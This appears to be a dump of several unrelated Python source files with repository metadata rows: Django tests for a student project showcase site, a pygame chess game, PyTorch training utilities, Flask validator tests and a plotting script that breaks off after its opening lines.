                       display_picture="https://via.placeholder.com/150",
                       graduation_year=2021, pillar="ESD")

    def test_user_get_name(self):
        tom = User.objects.get(username="tom")
        self.assertEqual(tom.display_name, "Tom Magnanti")
        jane = User.objects.get(username="jane")
        self.assertEqual(jane.display_name, "Jane Tan")

    def test_user_get_year(self):
        tom = User.objects.get(username="tom")
        self.assertEqual(tom.graduation_year, 2018)
        jane = User.objects.get(username="jane")
        self.assertEqual(jane.graduation_year, 2021)

    def test_user_get_pillar(self):
        tom = User.objects.get(username="tom")
        self.assertEqual(tom.pillar, "ISTD")
        jane = User.objects.get(username="jane")
        self.assertEqual(jane.pillar, "ESD")

    # test user profile page contents
    def test_user_page_load(self):
        url = reverse("projects:user", args=("tom",))
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
        url = reverse("projects:user", args=("jane",))
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)

    def test_user_page_not_empty(self):
        url = reverse("projects:user", args=("tom",))
        response = self.client.get(url)
        self.assertGreater(len(response.content), LEN_BASE)
        url = reverse("projects:user", args=("jane",))
        response = self.client.get(url)
        self.assertGreater(len(response.content), LEN_BASE)

    def test_user_page_name(self):
        url = reverse("projects:user", args=("tom",))
        response = str(self.client.get(url).content)
        self.assertEqual("Tom Magnanti" in response, True)
        url = reverse("projects:user", args=("jane",))
        response = str(self.client.get(url).content)
        self.assertEqual("Jane Tan" in response, True)

    def test_user_page_year(self):
        url = reverse("projects:user", args=("tom",))
        response = str(self.client.get(url).content)
        self.assertEqual("2018" in response, True)
        url = reverse("projects:user", args=("jane",))
        response = str(self.client.get(url).content)
        self.assertEqual("2021" in response, True)

    def test_user_page_pillar(self):
        url = reverse("projects:user", args=("tom",))
        response = str(self.client.get(url).content)
        self.assertEqual("ISTD" in response, True)
        url = reverse("projects:user", args=("jane",))
        response = str(self.client.get(url).content)
        self.assertEqual("ESD" in response, True)

    def test_user_page_performance(self):
        # Crude wall-clock budget: 20 page renders in under 1.5 s.
        # NOTE(review): timing-based, may be flaky on slow CI machines.
        start = time.time()
        for i in range(10):
            url = reverse("projects:user", args=("tom",))
            response = self.client.get(url)
            url = reverse("projects:user", args=("jane",))
            response = self.client.get(url)
        duration = time.time() - start
        self.assertLess(duration, 1.5)
class ProjectShowcaseTestCase(TestCase):
    """Project model behaviour and the public project showcase pages."""

    def setUp(self):
        pm = OpenSUTDProjectManager()
        pm.create_project(project_uid="ACAD_00001",
                          title="OpenSUTD Web Platform",
                          caption="Sample project 1",
                          category="ACAD",
                          url="https://github.com/OpenSUTD/web-platform-prototype",
                          poster_url="https://via.placeholder.com/150",
                          featured_image="https://via.placeholder.com/150")
        um = OpenSUTDUserManager()
        um.create_user("tom", display_name="Tom Magnanti",
                       display_picture="https://via.placeholder.com/150",
                       graduation_year=2018, pillar="ISTD")
        um.create_user("jane", display_name="Jane Tan",
                       display_picture="https://via.placeholder.com/150",
                       graduation_year=2021, pillar="ESD")

    def test_project_properties(self):
        proj = Project.objects.get(project_uid="ACAD_00001")
        self.assertEqual(proj.title, "OpenSUTD Web Platform")

    def test_add_user_project(self):
        pm = OpenSUTDProjectManager()
        pm.add_user_to_project("ACAD_00001", "tom")
        proj = Project.objects.get(project_uid="ACAD_00001")
        self.assertEqual(len(proj.users.all()), 1)
        pm.add_user_to_project("ACAD_00001", "jane")
        self.assertEqual(len(proj.users.all()), 2)

    def test_add_tag_project(self):
        # Tags are supplied as one comma-separated string.
        pm = OpenSUTDProjectManager()
        pm.add_tag_to_project("ACAD_00001", "rand1,rand2")
        proj = Project.objects.get(project_uid="ACAD_00001")
        self.assertEqual(len(proj.tags.all()), 2)

    def test_add_del_user_project(self):
        tom = User.objects.get(username="tom")
        jane = User.objects.get(username="jane")
        proj = Project.objects.get(project_uid="ACAD_00001")
        proj.users.add(tom)
        proj.users.add(jane)
        proj.users.remove(jane)
        self.assertEqual(len(proj.users.all()), 1)

    def test_project_page_not_approved(self):
        # A rejected project's page renders the custom 404 (still HTTP 200).
        pm = OpenSUTDProjectManager()
        pm.set_project_status("ACAD_00001", "REJECT")
        url = reverse("projects:project_page", args=("ACAD_00001",))
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
        self.assertEqual("Error 404: Page Not Found!" in str(
            response.content), True)
        self.assertGreater(len(response.content), LEN_BASE)

    def test_project_page_approved(self):
        pm = OpenSUTDProjectManager()
        pm.set_project_status("ACAD_00001", "ACCEPT")
        url = reverse("projects:project_page", args=("ACAD_00001",))
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
        self.assertGreater(len(response.content), LEN_BASE)

    def test_project_page_name(self):
        pm = OpenSUTDProjectManager()
        pm.set_project_status("ACAD_00001", "ACCEPT")
        url = reverse("projects:project_page", args=("ACAD_00001",))
        response = str(self.client.get(url).content)
        self.assertEqual("OpenSUTD Web Platform" in response, True)

    def test_project_tag(self):
        pm = OpenSUTDProjectManager()
        pm.set_project_status("ACAD_00001", "ACCEPT")
        pm.add_tag_to_project("ACAD_00001", "tag1,tag2")
        url = reverse("projects:project_page", args=("ACAD_00001",))
        response = str(self.client.get(url).content)
        self.assertEqual("tag1" in response, True)
        self.assertEqual("tag2" in response, True)

    def test_project_page_contents(self):
        pm = OpenSUTDProjectManager()
        pm.set_project_status("ACAD_00001", "ACCEPT")
        url = reverse("projects:project_page", args=("ACAD_00001",))
        response = str(self.client.get(url).content)
        # print(response)
        # test top and bottom of contents
        # this does not pass on Travis for Pull Request builds
        # due to them disabling env variables for security reasons
        #self.assertEqual("Prototype for the Eventual OpenSUTD Web Platform" in response, True)
        #self.assertEqual("Data Model" in response, True)
        self.assertGreater(len(response), LEN_BASE)

    def test_project_page_load(self):
        pm = OpenSUTDProjectManager()
        pm.set_project_status("ACAD_00001", "ACCEPT")
        url = reverse("projects:project_page", args=("ACAD_00001",))
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)

    def test_project_page_not_empty(self):
        pm = OpenSUTDProjectManager()
        pm.set_project_status("ACAD_00001", "ACCEPT")
        url = reverse("projects:project_page", args=("ACAD_00001",))
        response = str(self.client.get(url).content)
        self.assertGreater(len(response), LEN_BASE)

    def test_project_author_name(self):
        pm = OpenSUTDProjectManager()
        pm.set_project_status("ACAD_00001", "ACCEPT")
        pm.add_user_to_project("ACAD_00001", "tom")
        url = reverse("projects:project_page", args=("ACAD_00001",))
        response = str(self.client.get(url).content)
        self.assertEqual("Tom Magnanti" in response, True)

    def test_project_author_pillar(self):
        pm = OpenSUTDProjectManager()
        pm.set_project_status("ACAD_00001", "ACCEPT")
        pm.add_user_to_project("ACAD_00001", "tom")
        url = reverse("projects:project_page", args=("ACAD_00001",))
        response = str(self.client.get(url).content)
        self.assertEqual("ISTD" in response, True)

    def test_project_list_page(self):
        pm = OpenSUTDProjectManager()
        pm.set_project_status("ACAD_00001", "ACCEPT")
        url = reverse("projects:projects_list")
        response = str(self.client.get(url).content)
        self.assertEqual("OpenSUTD Web Platform" in response, True)
        self.assertEqual("Sample project 1" in response, True)

    def test_project_page_performance(self):
        # Crude wall-clock budget: 10 renders in under 1.5 s.
        # NOTE(review): timing-based, may be flaky on slow CI machines.
        start = time.time()
        for _ in range(10):
            url = reverse("projects:project_page", args=("ACAD_00001",))
            response = self.client.get(url)
        duration = time.time() - start
        self.assertLess(duration, 1.5)
| 40.530899 | 117 | 0.585557 | 28,251 | 0.978966 | 0 | 0 | 1,771 | 0.061369 | 0 | 0 | 6,928 | 0.240072 |
d346045a2a702b4b5d37883e341ba6820c6a9156 | 11,851 | py | Python | chess/__main__.py | quadratic-bit/pygame-chess | 83e8329a0e294008191770e7ddace52572bf7460 | [
"MIT"
] | 3 | 2021-12-22T08:28:21.000Z | 2022-01-05T03:44:50.000Z | chess/__main__.py | quadratic-bit/pygame-chess | 83e8329a0e294008191770e7ddace52572bf7460 | [
"MIT"
] | null | null | null | chess/__main__.py | quadratic-bit/pygame-chess | 83e8329a0e294008191770e7ddace52572bf7460 | [
"MIT"
] | null | null | null | from sys import exit
from typing import Optional, Final
import pygame
from rich.traceback import install
from chess.board import Chessboard, Move, PieceType, PieceColour
from chess.bot import ChessBot
from chess.const import GameState
from chess.utils import load_image, load_sound, load_font
install(show_locals=True)
def terminate() -> None:
    """Shut pygame down cleanly and exit the process with status 0."""
    pygame.quit()
    # sys.exit(0) simply raises SystemExit(0); raise it directly.
    raise SystemExit(0)
def main():
# Game setup
# Pygame stuff
pygame.init()
SCREEN_W, SCREEN_H = SCREEN_SHAPE = 1200, 800 # type: Final
screen = pygame.display.set_mode(SCREEN_SHAPE)
pygame.display.set_caption("Chess")
# Colours
colour_bg = pygame.Color("#443742")
colour_contrast_bg = pygame.Color("#8D80AD")
# FPS handler
clock = pygame.time.Clock()
FPS = 60
# Creating a board using FEN
# Start position: rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1
# Advanced: 1r1q3r/3b2bk/p5pp/2QB4/5p2/P5nP/1PP5/2KRR3 b - - 6 12
# Pawn promotion: 8/6P1/2Q5/4p3/3qP3/5Q2/1q3PK1/qk6 w - - 36 73
# Checkmate: 3rkbnr/1p1bp3/1q1p3p/p5p1/3n4/PPR2Q2/5PPP/6K1 w - - 1 2
fen_game_state = "rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1"
board = Chessboard.from_fen(fen_game_state)
# Sounds
sound_common = load_sound("common.ogg")
sound_check = load_sound("check.ogg")
# Fonts
font_header = load_font("ubuntumono/UbuntuMono-R.ttf", 90)
font_option = load_font("ubuntumono/UbuntuMono-B.ttf", 55)
# Defining variables to interact with player
grabbing: Optional[tuple[int, int]] = None
hovering = False
# Render Flag
last_move: Optional[Move] = None
# Defining game loop functions
def start_screen() -> None:
"""Start screen"""
nonlocal screen, font_header, font_option
bg_start_img = pygame.transform.scale(load_image('bg_start.png'), SCREEN_SHAPE)
title = font_header.render("Шахматы", True, pygame.Color("white"))
option = font_option.render("Нажмите любую клавишу...", True, pygame.Color("white"))
screen.blit(bg_start_img, (0, 0))
screen.blit(title, (420, 200))
screen.blit(option, (270, 650))
pygame.display.flip()
while True:
for event_ in pygame.event.get():
if event_.type == pygame.QUIT:
terminate()
elif event_.type == pygame.KEYDOWN or event_.type == pygame.MOUSEBUTTONDOWN:
return
clock.tick(FPS)
def choose_game_mode_screen() -> bool:
"""Game mode screen ( True if vs AI, False otherwise )"""
nonlocal screen
screen.fill(colour_bg)
pygame.draw.rect(screen, colour_contrast_bg, (300, 352, 600, 96))
pygame.draw.rect(screen, colour_contrast_bg, (340, 576, 520, 96))
button_vs_ai = font_header.render("Выберите режим игры", True, "white")
button_vs_player = font_option.render("Против компьютера", True, "black")
screen.blit(button_vs_ai, (170, 131))
screen.blit(button_vs_player, (400, 368))
screen.blit(font_option.render("Против игрока", True, "black"), (460, 593))
# Icons by Font Awesome!
# License: https://fontawesome.com/license/free
screen.blit(pygame.transform.scale(load_image('desktop-solid.png'), (80, 80)), (308, 360))
screen.blit(pygame.transform.scale(load_image('chess-solid.png'), (80, 80)), (348, 584))
pygame.display.flip()
button_rects = [pygame.Rect(300, 352, 600, 96), pygame.Rect(340, 576, 520, 96)]
def is_colliding(m_pos: tuple[int, int]) -> bool:
return any(map(lambda b: b.x < m_pos[0] < b.x + b.w and b.y < m_pos[1] < b.y + b.h, button_rects))
while True:
for event_ in pygame.event.get():
if event_.type == pygame.QUIT:
terminate()
elif event_.type == pygame.MOUSEBUTTONDOWN:
if is_colliding(event_.pos):
if button_rects[0].x < event_.pos[0] < button_rects[0].x + button_rects[0].w and \
button_rects[0].y < event_.pos[1] < button_rects[0].y + button_rects[0].h:
return True
return False
elif event_.type == pygame.MOUSEMOTION:
if is_colliding(event_.pos):
pygame.mouse.set_cursor(pygame.SYSTEM_CURSOR_HAND)
else:
pygame.mouse.set_cursor(pygame.SYSTEM_CURSOR_ARROW)
clock.tick(FPS)
def end_screen(state: GameState, board_state: tuple) -> None:
board.render(screen, last_move, game_info=board_state)
scaffold = pygame.Surface(SCREEN_SHAPE)
pygame.draw.rect(scaffold, pygame.Color("black"),
(0, 0, SCREEN_W, SCREEN_H))
scaffold.set_alpha(0)
screen.blit(scaffold, (0, 0))
end_font = load_font("ubuntumono/UbuntuMono-R.ttf", 90)
end_font_colour = pygame.Color("white")
mate = end_font.render(
"Мат!"
if state == GameState.Checkmate
else "Пат!", True, end_font_colour)
score = end_font.render(
"0-1"
if board.active_colour == PieceColour.White
else "1-0", True, end_font_colour)
bg = pygame.Surface((600, 400))
bg.fill(pygame.Color("black"))
bg.set_alpha(180)
mate.set_alpha(255)
score.set_alpha(255)
mate_rect = mate.get_rect()
bg_rect = bg.get_rect()
score_rect = score.get_rect()
mdx = (bg_rect.w - mate_rect.w) // 2
mdy = (bg_rect.h - mate_rect.h) // 3
sdx = (bg_rect.w - score_rect.w) // 2
sdy = (bg_rect.h - score_rect.h) // 1.5
screen.blit(bg, (300, 200))
screen.blit(mate, (300 + mdx, 200 + mdy))
screen.blit(score, (300 + sdx, 200 + sdy))
pygame.display.flip()
pygame.mouse.set_cursor(pygame.SYSTEM_CURSOR_ARROW)
while True:
for e in pygame.event.get():
if e.type == pygame.QUIT:
terminate()
elif e.type == pygame.KEYDOWN or e.type == pygame.MOUSEBUTTONDOWN:
return
def toggle_state(board_state: tuple) -> bool:
"""Check and toggle game state (for endgames especially)"""
state = board.toggle_state()
if state == GameState.Continue:
return False
else:
end_screen(state, board_state)
return True
def game_loop(vs_ai: bool) -> None:
"""Main game loop"""
nonlocal grabbing, hovering, last_move
# My linter can't handle unsigned variables like these
bot = last_move_uncaught = None
if vs_ai:
# Initialising the AI
bot = ChessBot()
# Bot Flag
last_move_uncaught = False
# Toggle flag
board_info: Optional[tuple] = None
# Initial rendering
board.render(screen)
pygame.display.flip()
# Starting main loop
while True:
for event in pygame.event.get():
# Quitting game
if event.type == pygame.QUIT:
terminate()
# LMB while hovering above a piece (grab a piece)
if event.type == pygame.MOUSEBUTTONDOWN and \
event.button == pygame.BUTTON_LEFT and hovering:
# Find grabbed piece
grabbing = (event.pos[0] // 100, event.pos[1] // 100)
if board.at(*grabbing).Colour != board.active_colour:
# Wrong colour!
grabbing = None
else:
# Render a board with that grabbed piece being grabbed
board.render(screen, last_move, grabbing, event.pos,
game_info=board_info)
pygame.display.flip()
# Releasing LMB
elif event.type == pygame.MOUSEBUTTONUP and \
event.button == pygame.BUTTON_LEFT:
# Get position where player dropped the piece
released = (event.pos[0] // 100, event.pos[1] // 100)
if pygame.mouse.get_focused() and grabbing is not None and \
released != grabbing and event.pos[0] <= 800 and \
event.pos[1] <= 800:
# Trying to make move
x, y = grabbing[0] + grabbing[1] * 8, \
released[0] + released[1] * 8
move = Move(x, y, board.at(*released))
# If we can make move -> let the bot make the next one
move = board.can_make(move)
if move is not None:
board.make_move(move)
if board.king_is_safe(board.passive_colour):
sound_common.play()
else:
sound_check.play()
last_move = move
last_move_uncaught = True
if toggle_state(board_info):
return
# Stop grabbing
grabbing = None
# Rendering board after releasing piece
board.render(screen, last_move, game_info=board_info)
pygame.display.flip()
if vs_ai and last_move_uncaught is not None and bot is not None:
# Bot's turn
if last_move is not None and last_move_uncaught:
last_move, board_info = bot.get_move(board, last_move)
board.make_move(last_move)
if board.king_is_safe(board.passive_colour):
sound_common.play()
else:
sound_check.play()
if toggle_state(board_info):
return
# Updating flag
last_move_uncaught = False
# Rendering board after bot's turn
board.render(screen, last_move, game_info=board_info)
pygame.display.flip()
# Handling mouse and cursor
if pygame.mouse.get_focused():
pos = pygame.mouse.get_pos()
# Changing cursor state
if board.at(pos[0] // 100, pos[1] // 100).Type != PieceType.Empty:
pygame.mouse.set_cursor(pygame.SYSTEM_CURSOR_HAND)
hovering = True
else:
pygame.mouse.set_cursor(pygame.SYSTEM_CURSOR_ARROW)
hovering = False
# Rendering board and a hovering piece
if grabbing:
board.render(screen, last_move, grabbing, pos,
game_info=board_info)
pygame.display.flip()
else:
# Mouse is out of window -> stop grabbing
grabbing = None
board.render(screen, last_move, game_info=board_info)
pygame.display.flip()
hovering = False
clock.tick(FPS)
# Starting the game
start_screen()
while True:
# Main loop
game_loop(choose_game_mode_screen())
# Resetting the board
board = Chessboard.from_fen(fen_game_state)
if __name__ == "__main__":
main()
| 42.938406 | 110 | 0.537845 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,915 | 0.160547 |
d346329c9ae09e1ba6b9cdabc40a15e9d8362a75 | 532 | py | Python | rfb_utils/scenegraph_utils.py | N500/RenderManForBlender | 76de176322a130b657a898fef7123168677f67eb | [
"MIT"
] | 5 | 2018-01-13T09:37:35.000Z | 2021-07-19T08:55:28.000Z | rfb_utils/scenegraph_utils.py | N500/RenderManForBlender | 76de176322a130b657a898fef7123168677f67eb | [
"MIT"
] | 3 | 2018-01-17T22:32:24.000Z | 2018-01-22T13:36:31.000Z | rfb_utils/scenegraph_utils.py | N500/RenderManForBlender | 76de176322a130b657a898fef7123168677f67eb | [
"MIT"
] | 2 | 2020-02-01T15:37:09.000Z | 2020-06-16T16:40:17.000Z | def set_material(sg_node, sg_material_node):
'''Sets the material on a scenegraph group node and sets the materialid
user attribute at the same time.
Arguments:
sg_node (RixSGGroup) - scene graph group node to attach the material.
sg_material_node (RixSGMaterial) - the scene graph material node
'''
sg_node.SetMaterial(sg_material_node)
attrs = sg_node.GetAttributes()
attrs.SetString('user:__materialid', sg_material_node.GetIdentifier().CStr())
sg_node.SetAttributes(attrs) | 38 | 81 | 0.725564 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 302 | 0.567669 |
d34829b6ba82dd4f1000c257500d4c5fd0963053 | 1,766 | py | Python | models/attention_ensemble_diff_layers.py | tlatkowski/attention-ensemble-gene-expression | 7ef2361ddb758f6af7d3e948f2ae793363909f7d | [
"MIT"
] | null | null | null | models/attention_ensemble_diff_layers.py | tlatkowski/attention-ensemble-gene-expression | 7ef2361ddb758f6af7d3e948f2ae793363909f7d | [
"MIT"
] | 7 | 2017-11-03T12:08:14.000Z | 2017-12-04T18:48:41.000Z | models/attention_ensemble_diff_layers.py | tlatkowski/attention-ensemble-gene-expression | 7ef2361ddb758f6af7d3e948f2ae793363909f7d | [
"MIT"
] | null | null | null | import tensorflow as tf
from layers.attention_layers import attention_layer
from layers.common_layers import init_inputs
from layers.feed_forward_layers import feed_forward_diff_features, feed_forward_diff_layers
from utils.hyperparams import Hyperparams as hp
class AttentionBasedEnsembleNets:
def __init__(self, selection_methods, num_features, learning_rate=0.01):
with tf.name_scope('input'):
self.nn_inputs = init_inputs(num_features, selection_methods)
self.labels = tf.placeholder(dtype=tf.float32, shape=[None, 1], name='labels')
with tf.name_scope('ff'):
nets = {'fisher': [200, 50], 'ttest': [200, 50], 'corr': [200, 50], 'random': [200, 50]}
feed_forward = feed_forward_diff_layers(self.nn_inputs, nets)
with tf.name_scope('output'):
out = attention_layer(feed_forward, attention_size=50)
logits = tf.layers.dense(out, units=1)
sig = tf.nn.sigmoid(logits)
predictions = tf.round(sig)
with tf.name_scope('train'):
self.loss = tf.losses.sigmoid_cross_entropy(
multi_class_labels=self.labels, logits=logits)
self.opt = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(self.loss)
with tf.name_scope('summaries'):
self.acc = tf.reduce_mean((predictions * self.labels) + ((1 - predictions) * (1 - self.labels)))
self.precision, precision_op = tf.metrics.precision(self.labels, predictions)
# summaries
tf.summary.scalar('loss', self.loss)
tf.summary.scalar('accuracy', self.acc)
tf.summary.scalar('precision_op', precision_op)
self.merged_summary_op = tf.summary.merge_all()
| 45.282051 | 108 | 0.663647 | 1,501 | 0.849943 | 0 | 0 | 0 | 0 | 0 | 0 | 115 | 0.065119 |
d3498dff4622ae6084c3e6cc4ffe4f73a4a1af00 | 1,965 | py | Python | webapps/ivs/test/test_validators_views.py | mongodb-labs/mongo-web-shell | b306390e26888f0a0bf77cf99528e4e6bc41f0a8 | [
"ECL-2.0",
"Apache-2.0"
] | 22 | 2015-09-29T10:23:23.000Z | 2022-01-26T09:50:11.000Z | webapps/ivs/test/test_validators_views.py | pilliq/mongo-web-shell | 03cbc8815982d0eb160ec239bf3a36c7a2e08dde | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | webapps/ivs/test/test_validators_views.py | pilliq/mongo-web-shell | 03cbc8815982d0eb160ec239bf3a36c7a2e08dde | [
"ECL-2.0",
"Apache-2.0"
] | 10 | 2015-11-26T16:08:30.000Z | 2021-03-03T15:11:23.000Z | # Copyright 2013 10gen Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import types
import mock
import sys
from tests import MongoWSTestCase
from mongows.validators.ValidationTest import ValidationTest
class ValidatorsTestCase(MongoWSTestCase):
def test_imports_and_runs_the_specified_file(self):
# Create module test_script in scripts
test_script = types.ModuleType('test_script')
run_mock = mock.MagicMock()
class ValidationTestCase(ValidationTest):
def run(self):
run_mock(self.res_id)
return 'ok', 200
test_script.__dict__.update({'ValidationTestCase': ValidationTestCase})
sys.modules['mongows.validators.scripts.test_script'] = test_script
response = self.app.post('/validate/test_script',
data={'res_id': 'foo'})
self.assertEqual(response.data, 'ok')
self.assertEqual(response.status_code, 200)
run_mock.assert_called_once_with('foo')
del sys.modules['mongows.validators.scripts.test_script']
def test_returns_404_when_accessing_nonexistent_script(self):
response = self.app.post('/validate/test_script',
data={'res_id': 'foo'})
expected_message = 'Unknown validation script test_script'
self.assertEqual(response.data, expected_message)
self.assertEqual(response.status_code, 404)
| 38.529412 | 79 | 0.690585 | 1,230 | 0.625954 | 0 | 0 | 0 | 0 | 0 | 0 | 862 | 0.438677 |
d349bccc9afad8b3db6c0df14da872b974c7b94e | 9,370 | py | Python | utils/train.py | fbuchert/mixmatch-pytorch | 5dc989432bf26561b3c40ea03b319d12c7ace20b | [
"MIT"
] | null | null | null | utils/train.py | fbuchert/mixmatch-pytorch | 5dc989432bf26561b3c40ea03b319d12c7ace20b | [
"MIT"
] | null | null | null | utils/train.py | fbuchert/mixmatch-pytorch | 5dc989432bf26561b3c40ea03b319d12c7ace20b | [
"MIT"
] | null | null | null | import math
from itertools import product
from typing import Tuple, List, Optional, Union
import numpy as np
import torch
import torch.nn as nn
import torch.nn.init as init
class EMA:
"""
Class that keeps track of exponential moving average of model parameters of a particular model.
Also see https://github.com/chrischute/squad/blob/master/util.py#L174-L220.
"""
def __init__(self, model: torch.nn.Module, decay: float):
"""
Initialization method for the EMA class.
Parameters
----------
model: torch.nn.Module
Torch model for which the EMA instance is used to track the exponential moving average of parameter values
decay: float
Decay rate used for exponential moving average of parameters calculation:
ema_t = decay * p_t + (1-decay) * ema_(t-1)
"""
self.decay = decay
self.shadow = {}
self.original = {}
# Register model parameters
for name, param in model.named_parameters():
if param.requires_grad:
self.shadow[name] = param.clone().detach()
def __call__(self, model):
"""
Implements call method of EMA class
Parameters
----------
model: torch.nn.Module
Current model based on which the EMA parameters are updated
"""
with torch.no_grad():
for name, param in model.named_parameters():
if param.requires_grad:
assert name in self.shadow
new_average = (1.0 - self.decay) * param + self.decay * self.shadow[
name
]
self.shadow[name] = new_average
def assign(self, model: torch.nn.Module):
"""
This method assigns the parameter EMAs saved in self.shadow to the given model. The current parameter values
of the model are saved to self.original. These original parameters can be restored using self.resume.
Parameters
----------
model: torch.nn.Module
Model to which the current parameter EMAs are assigned.
"""
for name, param in model.named_parameters():
if param.requires_grad:
self.original[name] = param.clone()
param.data.copy_(self.shadow[name].data)
def resume(self, model: torch.nn.Module):
"""
This method restores the parameters saved in self.original to the given model. It is usually called after
the `assign` method.
Parameters
----------
model: torch.nn.Module
Torch model to which the original parameters are restored
"""
for name, param in model.named_parameters():
if param.requires_grad:
param.data.copy_(self.original[name].data)
class ModelWrapper:
"""
ModelWrapper which can be used to extract outputs of intermediate layer of a network.
"""
def __init__(self, task_model: nn.Module, to_extract: Tuple):
"""
Initializes a model wrapper for the specified task model and layer names to extract.
Parameters
----------
task_model: torch.nn.Module
Torch model to which the original parameters are restored
to_extract: Tuple
Tuple that holds names of layers for which intermediate results should be extracted and returned,
e.g. to_extract=(`avgpool`, `fc`) to extract intermediate results after the avgpool layer and last fully
connected layer in a ResNet for example.
"""
self.task_model = task_model
self.to_extract = to_extract
def __call__(self, x: torch.Tensor):
"""
The __call__ method iterates through all modules of the provided `task_model` separately. It extracts and
returns the intermediate results at layers specified by to_extract
Parameters
----------
x: torch.Tensor
Batch of samples, e.g. images, which are passed through the network and for which specified intermediate
results are extracted
Returns
----------
results: Optional[torch.Tensor, List[torch.Tensor]]
Results of forward pass of input batch through the given task model. If len(to_extract) is 1, only the
single result tensor is returned. Otherwise, a list of tensors is returned, which holds the intermediate
results of specified layers in the order of occurrence in the network.
"""
results = []
for name, child in self.task_model.named_children():
x = child(x)
if name == "avgpool":
x = torch.flatten(x, 1)
if name in self.to_extract:
results.append(x)
return results[-1] if len(results) == 1 else results
def train(self):
self.task_model.train()
def eval(self):
self.task_model.eval()
def cuda(self):
self.task_model.cuda()
def to(self, device: Union[str, torch.device]):
self.task_model.to(device)
def get_embedding_dim(self):
last_layer = list(self.task_model.modules())[-1]
return last_layer.in_features
def model_init(m: torch.nn.Module):
"""
Method that initializes torch modules depending on their type:
- Convolutional Layers: Xavier Uniform Initialization
- BatchNorm Layers: Standard initialization
- Fully connected / linear layers: Xavier Normal Initialization#
Parameters
----------
m: torch.nn.Module
Torch module which to be initialized. The specific initialization used depends on the type of module.
"""
classname = m.__class__.__name__
if classname.find("Conv") != -1:
init.xavier_uniform_(m.weight, gain=math.sqrt(2))
if m.bias is not None:
init.constant_(m.bias, 0)
elif classname.find("BatchNorm") != -1:
init.constant_(m.weight, 1)
init.constant_(m.bias, 0)
elif classname.find("Linear") != -1:
init.xavier_normal_(m.weight, gain=math.sqrt(2))
if m.bias is not None:
init.constant_(m.bias, 0)
def wd_check(wd_tuple: Tuple, name: str):
"""
Method that checks if parameter name matches the key words in wd_tuple. This check is used to filter certain
types of parameters independent of the layer, which it belongs to, e.g. `conv1.weight`.
Parameters
----------
wd_tuple: Tuple
Tuple which contains the phrases which are checked for, e.g. (`conv`, `weight`) or (`fc`, `weight`)
name: str
Name of parameter as saved in state dict, e.g. `conv1.weight`
Returns
----------
wd_check: bool
Returns a bool indicating whether all strings in wd_tuple are contained in name.
"""
return all([x in name for x in wd_tuple])
def apply_wd(model: torch.nn.Module, wd: float, param_names: List = ["conv", "fc"], types: List = ["weight"]):
"""
Method that manually applies weight decay to model parameters that match the specified parameter names and types.
Parameters
----------
model: torch.nn.Module
Model to which weight decay is applied
wd: float
Float specifying weight decay. Parameters are updated to: param = (1-wd) * param
param_names: List (default: ["conv", "fc"])
Parameter names (or substring of names) for which the weight decay is applied.
types: List (default: ["weight"])
Parameter types for which weight decay is applied.
"""
with torch.no_grad():
for name, param in model.state_dict().items():
if any(
[wd_check(wd_tuple, name) for wd_tuple in product(param_names, types)]
):
param.mul_(1 - wd)
def set_bn_running_updates(model, enable: bool, bn_momentum: float = 0.001):
"""
Method that enables or disables updates of the running batch norm vars by setting the momentum parameter to 0
"""
for m in model.modules():
if isinstance(m, nn.BatchNorm2d):
m.momentum = bn_momentum if enable else 0.0
def linear_rampup(current: int, rampup_length: int):
if rampup_length == 0:
return 1.0
else:
current = np.clip(current / rampup_length, 0.0, 1.0)
return float(current)
def set_grads(model: torch.nn.Module, trainable_layers: List[str]):
"""
Method that enables or disables gradients of model parameters according to specified layers.
Parameters
----------
model: torch.nn.Module
Torch model for which parameter gradients should be set
trainable_layers: List
List of strings, i.e. layer / parameter names, for which training is enabled. For model parameters, which do not
match any pattern specified in trainable_layers, training is disable by setting requires_grad to False.
"""
def is_trainable(x, trainable_layers):
return any([(layer in x) or ('fc' in x) for layer in trainable_layers])
for p in model.parameters():
p.requires_grad = False
trainable_parameters = [n for n, p in model.named_parameters() if is_trainable(n, trainable_layers)]
for n, p in model.named_parameters():
if n in trainable_parameters:
p.requires_grad = True
| 36.745098 | 120 | 0.627215 | 5,105 | 0.544824 | 0 | 0 | 0 | 0 | 0 | 0 | 5,264 | 0.561793 |
d34a0f347fe4613cb57d033d0a6ac2ca4e0bbe81 | 2,647 | py | Python | plotting-cell-cycle.py | kbromma/DBCCode | 0315907c7e0f59d41339743fcca57716f0367f9a | [
"MIT"
] | null | null | null | plotting-cell-cycle.py | kbromma/DBCCode | 0315907c7e0f59d41339743fcca57716f0367f9a | [
"MIT"
] | null | null | null | plotting-cell-cycle.py | kbromma/DBCCode | 0315907c7e0f59d41339743fcca57716f0367f9a | [
"MIT"
] | null | null | null | import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import csv
import seaborn as sns
import itertools
import pandas as pd
import scipy
from scipy.signal import savgol_filter
from scipy.signal import find_peaks_cwt
from scipy.signal import boxcar
sns.set(font_scale=1.2)
sns.set_style("white")
colors = ["#95a5a6", "amber"]
sns.set_palette(sns.color_palette())
hr_24 = np.loadtxt("MDA DTX_1 4_24hr.txt", skiprows=1)
ctl = np.loadtxt("MDA DTX_1 Ctl.txt", skiprows=1)
hr_4 = np.loadtxt("MDA DTX_1 4hr.txt", skiprows=1)
# hr_2 = np.loadtxt("MDA-DTX-#2hr.txt", skiprows=1)
hr_8 = np.loadtxt("MDA DTX 8hr.txt", skiprows=1)
dmso = np.loadtxt("MDA DTX DMSO.txt", skiprows=1)
def filterDat(data):
